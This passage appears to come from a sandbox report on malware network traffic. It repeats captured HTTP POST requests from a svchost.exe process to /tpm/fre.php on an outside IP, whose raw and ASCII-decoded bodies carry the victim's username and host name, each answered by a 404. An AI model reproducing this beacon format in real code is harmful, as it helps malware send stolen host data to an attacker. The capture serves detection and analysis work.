                                                              Jan 7, 2025 11:02:00.675298929 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:01.182199001 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:01 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              7192.168.2.549712172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:01.366624117 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:01.372775078 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:01.907716990 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:01 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              8192.168.2.549714172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:02.096334934 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:02.102742910 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:02.633632898 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:02 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              9192.168.2.549715172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:02.795491934 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:02.801547050 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:03.320718050 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:03 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              10192.168.2.549716172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:03.612785101 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:03.617743969 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:04.082201958 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:03 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              11192.168.2.549717172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:04.243046045 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:04.247900963 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:04.771831036 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:04 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              12192.168.2.549718172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:04.950335979 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:04.955089092 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:05.482988119 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:05 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              13192.168.2.549719172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:05.688445091 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:05.693264961 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:06.191340923 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:06 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              14192.168.2.549720172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:06.449649096 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:06.454474926 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:06.944094896 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:06 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              15192.168.2.549721172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:07.163029909 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:07.167907953 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:07.693803072 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:07 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              16192.168.2.549722172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:07.851130009 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:07.855998039 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:08.371639013 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:08 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              17192.168.2.549723172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:08.538696051 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:08.543767929 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:09.043514013 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:08 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              18192.168.2.549724172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:09.198668003 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:09.203965902 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:09.690165997 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:09 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              19192.168.2.549725172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:09.855159998 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:09.860002995 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:10.371232986 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:10 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              20192.168.2.549727172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:10.541896105 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:10.546688080 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:11.080061913 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:10 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              21192.168.2.549730172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:11.228847027 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:11.233719110 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:11.739454031 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:11 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              22192.168.2.549732172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:11.953372002 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:11.958149910 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:12.466356039 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:12 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              23192.168.2.549734172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:12.613010883 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:12.617820978 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:13.113827944 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:13 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              24192.168.2.549736172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:13.254044056 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:13.258855104 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
